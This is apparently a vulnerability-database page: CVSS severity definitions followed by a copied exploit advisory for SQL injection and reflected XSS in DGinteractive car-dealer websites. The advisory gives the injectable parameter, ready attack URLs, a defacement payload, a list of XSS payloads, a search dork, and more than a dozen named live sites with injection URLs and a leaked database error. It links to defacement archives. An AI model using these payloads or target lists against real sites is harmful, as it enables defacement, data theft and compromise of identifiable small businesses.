The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: DGinteractive Internet Automobile XSS SQL Injection
####################################################################
# Exploit Title : DGinteractive Internet Automobile XSS SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21 May 2020
# Vendor Homepage : dginteractive.fr
+ dginteractive.fr/creation-de-sites-internet/creation-site-internet-mandataire-automobile-concession-garage
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-79 [ Improper Neutralization of Input During Web Page
Generation ('Cross-site Scripting') ]
CAPEC-66 [ SQL Injection ]
CAPEC-63 [ Cross-Site Scripting (XSS) ]
# Google Dorks : DGinteractive : cration de site internet automobile
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/KingSkrupellos
# Zone-H : zone-h.org/archive/notifier=KingSkrupellos
zone-h.org/archive/notifier=CyBeRiZM
# Mirror-H : mirror-h.org/search/hacker/948/
mirror-h.org/search/hacker/94/
mirror-h.org/search/hacker/1826/
# Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
defacer.id/archive/team/Cyberizm-Org
# Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
# Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
aljyyosh.org/hacker.php?id=Cyberizm.Org
aljyyosh.org/hacker.php?id=Cyberizm
# Zone-D : zone-d.org/attacker/id/69
# Pastebin : pastebin.com/u/KingSkrupellos
# Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
###################################################################
# Impact :
***********
DGinteractive is prone to an SQL-injection vulnerability because it fails to sufficiently
sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
application and execute arbitrary SQL commands in application`s database.
Further exploitation of this vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.
Reflected XSS (or Non-Persistent) :
***************************************
The server reads data directly from the HTTP request and reflects it back in the HTTP response.
Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
to a vulnerable web application, which is then reflected back to the victim and executed by the
web browser. The most common mechanism for delivering malicious content is to include
it as a parameter in a URL that is posted publicly or e-mailed directly to the victim.
URLs constructed in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects
the attacker's content back to the victim,the content is executed by the victim's browser.
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
***********************************************************************************
The software constructs all or part of an SQL command using externally-influenced input from an
upstream component, but it does not neutralize or incorrectly neutralizes special elements that could
modify the intended SQL command when it is sent to a downstream component.
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
********************************************************************************
The software does not neutralize or incorrectly neutralizes user-controllable input before
it is placed in output that is used as a web page that is served to other users.
Cross-site scripting (XSS) vulnerabilities occur when:
1. Untrusted data enters a web application, typically from a web request.
2. The web application dynamically generates a web page that contains this untrusted data.
3. During page generation, the application does not prevent the data from containing content
that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes,
mouse events, Flash, ActiveX, etc.
4. A victim visits the generated web page through a web browser, which contains
malicious script that was injected using the untrusted data.
5. Since the script comes from a web page that was sent by the web server, the victim's
web browser executes the malicious script in the context of the web server's domain.
6. This effectively violates the intention of the web browser's same-origin policy, which states
that scripts in one domain should not be able to access resources or run code in a different domain.
CAPEC-66: SQL Injection
************************
This attack exploits target software that constructs SQL statements based on user input.
An attacker crafts input strings so that when the target software constructs SQL statements
based on the input, the resulting SQL statement performs actions other than those the application intended.
SQL Injection results from failure of the application to appropriately validate input.
When specially crafted user-controlled input consisting of SQL syntax is used without proper validation
as part of SQL queries, it is possible to glean information from the database in ways not envisaged
during application design. Depending upon the database and the design of the application,
it may also be possible to leverage injection to have the database execute system-related commands
of the attackers' choice. SQL Injection enables an attacker to talk directly to the database,
thus bypassing the application completely. Successful injection can cause information disclosure
as well as ability to add or modify data in the database.
CAPEC-63: Cross-Site Scripting (XSS)
************************************
An adversary embeds malicious scripts in content that will be served to web browsers.
The goal of the attack is for the target software, the client-side browser, to execute the script
with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are
brought on by allowing remote hosts to execute code and scripts. Web browsers, for example,
have some simple security controls in place, but if a remote attacker is allowed to execute
scripts (through injecting them in to user-generated content like bulletin boards) then these
controls may be bypassed. Further, these attacks are very difficult for an end user to detect.
###################################################################
# SQL Vulnerable Parameter :
**************************
?page=resultat&formu_marque=[ID-NUMBER]&formu_categorie=[ID-NUMBER]&formu_modele=[ID-NUMBER]&formu_energie=[ID-NUMBER]&tri=prix%20desc&limite=[ID-NUMBER]&pagenb=[ID-NUMBER]&start=[SQL Injection]
# SQL Injection Exploit :
**********************
/index.php?page=resultat&formu_marque=[ID-NUMBER]&formu_categorie=[ID-NUMBER]&formu_modele=[ID-NUMBER]&formu_energie=[ID-NUMBER]&tri=prix%20desc&limite=[ID-NUMBER]&pagenb=[ID-NUMBER]&start=[SQL Injection]
# Cross Site Scripting XSS Exploit :
********************************
/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0
&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27%3Cmarquee
%3E%3Cfont%20color=lime%20size=32%3EHacked.By.KingSkrupellos.%3C/font%3E%3C/marquee%3E
1%27<marquee><font%20color=lime%20size=32>Hacked.By.KingSkrupellos.</font></marquee>
"><script>alert(String.fromCharCode(88,83,83))</script>
">--></SCRIPT>KingSkrupellos<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%20HTTP/1.1
<ScRipT>alert("XSS");</ScRipT>
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
><ScRiPt>alert(document.cookie)</script>
data:text/html,<script>alert(0)</script>
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
<svg onload=alert(1)//
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
###################################################################
# Example Vulnerable Sites and Vulnerable IP Addresses :
***************************************************
Reverse IP results for (213.186.33.2)
There are 60,082 domains hosted on this server.
Reverse IP results for (164.132.235.17)
There are 89,323 domains hosted on this server.
Reverse IP results for (213.186.33.19)
There are 145,637 domains hosted on this server.
Reverse IP results for (87.98.154.146)
There are 84,065 domains hosted on this server.
Reverse IP results for (213.186.33.107)
There are 1,380 domains hosted on this server.
Reverse IP results for (213.186.33.16)
There are 66,886 domains hosted on this server.
Reverse IP results for (217.160.0.58)
There are 14,732 domains hosted on this server.
Reverse IP results for (213.186.33.4)
There are 114,183 domains hosted on this server.
Reverse IP results for (164.132.235.17)
There are 89,323 domains hosted on this server.
Reverse IP results for (217.160.0.116)
There are 14,867 domains hosted on this server.
Reverse IP results for (213.186.33.40)
There are 95,065 domains hosted on this server.
Reverse IP results for (213.186.33.3)
There are 103,623 domains hosted on this server.
Reverse IP results for (81.88.48.95)
There are 11,443 domains hosted on this server.
Reverse IP results for (213.186.33.16)
There are 66,886 domains hosted on this server.
[+] milleniumauto.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] ie-auto.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] adourimport.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] autoimportjls.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] cuisinier-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] lmda-automobiles.fr//index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] auto-direct-import.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] neuve-occaz-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] milleniumautogalerie.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] garagefillon.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] autoimport72.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] priscar.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] camping-saint-meen.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
[+] cuisinier-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
###################################################################
# Example SQL Database Error :
****************************
Erreur recup liste produit You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '',16' at line 1 :: SELECT * FROM
dg_produit WHERE publie=1 AND vendu=0 GROUP BY id_produit ORDER BY titre ASC LIMIT 1',16
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or
access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '',16' at line 1' in /home/cuisiniezb
/www/inc.resultat.php:11 Stack trace: #0 /home/cuisiniezb/www/inc.resultat.php(11): PDO->
query('SELECT * FROM d...') #1 /home/cuisiniezb/www/index.php(538): include('/home/cuisiniez...')
#2 {main} thrown in /home/cuisiniezb/www/inc.resultat.php on line 11
###################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###################################################################
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum